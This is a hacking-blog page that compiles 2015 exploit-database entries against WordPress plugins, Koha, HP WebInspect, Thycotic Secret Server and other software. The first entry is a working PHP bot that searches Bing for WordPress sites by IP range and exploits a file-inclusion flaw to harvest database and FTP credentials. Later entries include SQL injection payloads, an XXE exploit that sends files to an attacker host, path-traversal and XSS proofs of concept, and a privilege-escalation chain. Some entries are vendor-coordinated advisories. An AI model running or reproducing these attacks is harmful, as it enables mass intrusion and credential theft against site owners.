######################################################################################
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Date: june 6, 2015 #
# Exploit Author: ViRuS OS #
# Google Dork: inurl:?fdx_switcher=mobile #
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Version: WP Mobile Edition Version 2.2.7 #
# Tested on : windows #
######################################################################################
Description :
Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>
# Exploite Code :
<?php
//ViRuS OS
set_time_limit(0);
error_reporting(0);
echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n";
print " Coded By _
__ _(_)_ __ _ _ ___ ___ ___
\ \ / / | '__| | | / __| / _ \/ __|
\ V /| | | | |_| \__ \ | (_) \__ \
\_/ |_|_| \__,_|___/ \___/|___/
Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Welcome Master ViRuS OS ################\n\n";
echo "Server Target IP : ";
$ip=trim(fgets(STDIN,1024));
$ip = explode('.',$ip);
$ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
for($i=0;$i <= 255;$i++)
{
$sites = array_map("site", bing("ip:$ip.$i wordpress"));
$un=array_unique($sites);
echo "[+] Scanning -> ", $ip.$i, ""."\n";
echo "Found : ".count($sites)." sites\n\n";
foreach($un as $pok){
$host=findit($file,"DB_HOST', '","');");
$db=findit($file,"DB_NAME', '","');");
$us=findit($file,"DB_USER', '","');");
$pw=findit($file,"DB_PASSWORD', '","');");
$bda="http://$pok";
$linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php';
$dn=($bda).($linkof);
$file=@file_get_contents($dn);
if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
echo "[+] Scanning => ".$bda."\n\n";
echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
$db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
$user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
$pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
$host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
$ux = "".$bda."\r\n";
$ux1 = "".$db."\r\n";
$ux2 = "".$user."\r\n";
$ux3 = "".$pass."\r\n";
$ux4 = "".$host."\r\n";
$save=fopen('exploited.txt','ab');
fwrite($save,"$ux");
fwrite($save,"$ux1");
fwrite($save,"$ux2");
fwrite($save,"$ux3");
fwrite($save,"$ux4");
}
elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
}
else{echo $bda." : Exploit failed \n\n";}
}
}
function findit($mytext,$starttag,$endtag) {
$posLeft = stripos($mytext,$starttag)+strlen($starttag);
$posRight = stripos($mytext,$endtag,$posLeft+1);
return substr($mytext,$posLeft,$posRight-$posLeft);
}
function site($link){
return str_replace("","",parse_url($link, PHP_URL_HOST));
}
function bing($what){
for($i = 1; $i <= 2000; $i += 10){
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
preg_match_all('#;a=(.*?)" h="#',$data, $links);
foreach($links[1] as $link){
$allLinks[] = $link;
}
if(!preg_match('#"sw_next"#',$data)) break;
}
if(!empty($allLinks) && is_array($allLinks)){
return array_unique(array_map("urldecode", $allLinks));
}
}
?>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863545677
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
=========================================================
[+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability
[+] Date :- 5 - June - 2015
[+] Vendor Homepage: :- http://main.pasworld.co.th/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php
site:go.th inurl:"detail.php?id="
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha
[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- detail.php?id=
[+] Affected Area(s) :- Entire admin, database, Server
=========================================================
[+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter
[+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php
[+] POC :- http://127.0.0.1/detail.php?id=[SQL]'
SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs
++++++++++++++++++++++++++
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=152 AND 1414=1414
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (random number) - 9 columns
Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982#
=========================================================
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
| Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi |
| Date: 05.19.2015 |
| Exploit Daddy: pancaker |
| Vendor Homepage: http://milw0rm.sourceforge.net/ |
| Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download |
| Version: v1.0 |
| Tested On: Ubuntu 10.04 |
|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
| SHOUTout: milw0rm &&& your mums pancakes |
| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs} |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
### vuln codez related.php ###
<?
include("include/functions.php");
$related = htmlspecialchars(trim($_GET['program'])); <-- this isnt going to save u
$query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'"); <- might as well b a straight get request lololol owned
$row = mysql_num_rows($query);
if($row){
?>
<html>
<head>
<title><? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode</title>
..zzz...
### manual ###
root@woop:~# zzz='10'
root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit"
root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz"
real 0m10.008s
user 0m0.004s
sys 0m0.004s
### sqlmap ###
root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba
_
___ ___| |_____ ___ ___ {1.0-dev-e8f87bf}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:46:53
[09:46:53] [INFO] resuming back-end DBMS 'mysql'
[09:46:53] [INFO] testing connection to the target URL
[09:46:53] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: program (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
---
[09:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.12
[09:46:53] [INFO] fetching current user
current user: 'root@localhost'
[09:46:53] [INFO] testing if current user is DBA
[09:46:53] [INFO] fetching current user
[09:46:53] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
[09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
| >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<< |
| <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>> |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
__
___________ ____ ____ _____ | | __ ___________
\____ \__ \ / \_/ ___\\__ \ | |/ // __ \_ __ \
| |_> > __ \| | \ \___ / __ \| <\ ___/| | \/
| __(____ /___| /\___ >____ /__|_ \\___ >__|
|__| \/ \/ \/ \/ \/ \/
.........................cant be pr0 without ascii art
#!/usr/bin/python
# libmimedir-free.py
#
# Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
#
# Jeremy Brown [jbrown3264/gmail]
# June 2015
#
# -Synopsis-
#
# Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls
# which occur during it's lexer's memory clean-up procedure. This could lead to exploitable
# conditions such as crafting a specific memory chunk to allow for arbitrary code execution.
#
# -Tested-
#
# libmimedir-0.5.1.tar.gz
# libmimedir-static 0.4-13.fc21
#
# -Notes-
#
# Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
# a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
# fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
#
from struct import pack
def main():
mime = "begin:vcard<x\nx;type=x;type=x,"
mime += pack("<Q", 0x4141414141414141) # mdm->p
mime += pack("<Q", 0x4242424242424242) # mdm->next
mime += ":x>x.l:x"
mime += pack("<H", 0x0000) # 2 x YY_END_OF_BUFFER_CHAR
print("Writing free.vcf to local directory...")
try:
with open("free.vcf", 'wb') as outfile:
outfile.write(mime)
except Exception as error:
print("Error: %s\n" % error);
return
print("Done\n")
return
if __name__ == "__main__":
main()
# Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125
1. Create website that exploits vulnerability.
1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://attacker/?p=%payl;'>">
1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.2.2. Attacker needs to start tool on the server that captures hashes.
2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
Linux (Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that :
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk
our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.
greets to Black Sniper
Regards T3N38R15
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
source: https://www.securityfocus.com/bid/53942/info
The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_alphacontent§ion=weblinks&Itemid=1&lang=de&limitstart=[sqli]
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# CVE ID : CVE-2015-3443
# Product: Secret Server [1]
# Vendor: Thycotic
# Subject: Stored Cross-Site Scripting Vulnerability (XSS)
# Risk: High
# Effect: Remotely exploitable
# Author: Marco Delai (marco.delai@csnc.ch)
# Date: June 24th 2015
#
#############################################################
Introduction:
-------------
Thycotic Secret Server enterprise password management software allows
the creation, management and control of critical passwords in one
centralized, web-based repository [1].
The identified vulnerability (stored Cross-Site Scripting) allows the
execution of JavaScript code in the browser of a valid user when it
toggle the password mask on a specially crafted password. This allows,
for example, an attacker to prepare a specially crafted shared password,
which when read by another user, can steal all other passwords the
victim has access to.
Vulnerable:
-----------
Secret Server customers on version 8.6.000000 to 8.8.000004 [2].
Technical Details
--------------------
Exploiting the vulnerability simply requires to:
1. Create a new password entry within Secret Server with the following
value: "Compass Security<script>alert("Compass Security")</script>"
2. Open the basic dashboard and toggle the password mask. The password
is retrieved from the server using an AJAX call and its value is
added straight to the page's DOM without validation. Thus, the
script included in step 1 is executed.
Note that the payload defined in step 1 did only get executed in the
basic dashboard view. The advanced dashboard did adequately encode the
password. Extract of the vulnerable page:
GET
/SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&audi
tAction=unmask HTTP/1.1
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 62
Content-Type: application/json; charset=utf-8
Expires: -1
[...]
Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
X-Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-UA-Compatible: IE=edge
"Compass Security<script>alert(\"Compass Security\")</script>"
Remediation:
------------
Update Secret Server to the latest version, which fixes the
vulnerability [2].
Milestones:
-----------
2015-02-19 Vulnerability discovered
2015-02-20 Vulnerability reported to vendor
2015-02-20 Vendor patch [2]
2015-06-24 Public disclosure
References:
-----------
[1] http://thycotic.com/products/secret-server/
[2]
http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability
CVE-ID:
====================================
CVE-2015-2169
CVSS:
====================================
3.5
Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)
software that helps you monitor and manage assets in your network from
Planning phase to Disposal phase. AssetExplorer provides you with a number
of ways to ensure discovery of all the assets in your network. You can
manage software & hardware assets, ensure software license compliance and
track purchase orders & contracts - the whole nine yards! AssetExplorer is
very easy to install and works right out of the box.
(Homepage: https://www.manageengine.com/products/asset-explorer/ )
Abstract Advisory Information:
==============================
Cross site scripting attack can be performed on the manage engine asset
explorer. If the 'publisher' name contains vulnerable script, it gets
executed in the browser.
Affected Products:
====================
Manage Engine
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)
Severity Level:
====================
Medium
Technical Details & Description:
================================
Add a vendor with a script in it to the registry.
Login to the product,
Scan the endpoint where the registry is modified.
In the right pane, go to software->Scanned Software
The script gets executed.
Vulnerable Product(s):
ManageEngine Asset Explorer
Affected Version(s):
Version 6.1.0 / Build Number 6112
(Earlier versions i did not test)
Vulnerability Type(s):
Persistent Cross Site Scripting
PoC:
=======================
Add the following registry entry in the machine, for targeted attack.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script> alert(\"XSS\"); </script>"
Security Risk:
==================
Medium.
Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)
Timeline:
==================
Discovered at Wed, March 3, 2015
Informed manage engine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015
# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4632
### CVE-2015-4632 ###
#### Titel: ####
Directory traversal
#### Type of vulnerability: ####
File Path Traversal
##### Exploitation vector:
Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search
##### Attack outcome:
Read access to arbitrary files on the system
#### Impact: ####
{low,medium,high,critical}
high
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4632
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search
#### Proof-of-concept: ####
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4630, CVE-2015-4631
### CVE-2015-4631 ###
#### Titel: ####
Multiple XSS and XSRF vulnerabilities in Koha
#### Type of vulnerability: ####
Koha suffers from multiple critical XSS and XSRF vulnerabilities
##### Exploitation vector:
The attack can be performed through a compromised user account (for example previous password retrieval if student user acoount through SQLI - CVE-2015-4633) or due to user that clicks on a malicious link (for example in a phishing mail, forum link etc)
##### Attack outcome:
1. An attacker may escalate privileges and even gain superlibrarian permissions.
2. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines.
3. Perform unauthorized actions with the permissions of a staff member
4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the websever
#### Impact: ####
{low,medium,high,critical}
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4631
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
Koha suffers from various critical XSS and XSRF vulnerabilities due to imprope input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks. This allows remote remote attackers to inject arbitrary web script or HTML and completely compromise the webpage.
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected from relfective XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")
#### Proof-of-concept: ####
Attack scenario:
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:
http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens
http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:
Create new user:
http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.
# Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4633
### CVE-2015-4633 ###
#### Titel: ####
Unauthenticated SQL Injection in Koha
#### Type of vulnerability: ####
An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database.
##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access the filesystem may be possible.
#### Impact: ####
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4633
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
